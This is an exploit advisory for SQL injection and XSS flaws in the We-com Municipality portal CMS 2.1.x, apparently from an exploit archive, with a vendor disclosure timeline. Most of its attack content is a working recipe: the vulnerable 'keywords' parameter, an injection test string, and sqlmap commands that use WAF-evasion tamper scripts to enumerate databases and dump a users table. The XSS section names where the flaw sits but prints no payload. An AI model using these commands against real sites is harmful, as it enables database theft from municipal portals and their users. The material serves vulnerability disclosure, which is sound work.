# Exploit Title: We-com Municipality portal CMS SQL Injection & XSS Vulnerability  
# Google Dork:N/A  
# Date: 2020-04-17  
# Exploit Author: @ThelastVvV  
# Vendor Homepage:  
# Version: 2.1.x  
# Tested on: 5.5.0-kali1-amd64  
Vendor contact timeline:  
2020-05-05: Contacting vendor through  
2020-05-26: A Patch is published in the versions  
2020-06-01: Release of security advisory  
PoC 1:  
The attacker once locate the sql vulnerability in the "keywords" parameter of the portal search bar then the attacker will be able to perform an automated process to exploit the secruity of Italien Municipality portal CMS   
POST Data: keywords='1'--  
SQLMAP Payload(s):  
sqlmap -u --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs  
sqlmap -u --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D **_db --tables  
sqlmap -u --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D **_db -T utenti  
PoC 2 :  
XSS Vulnerability  
Payload(s) :   
in the search bar:  
Admin panel: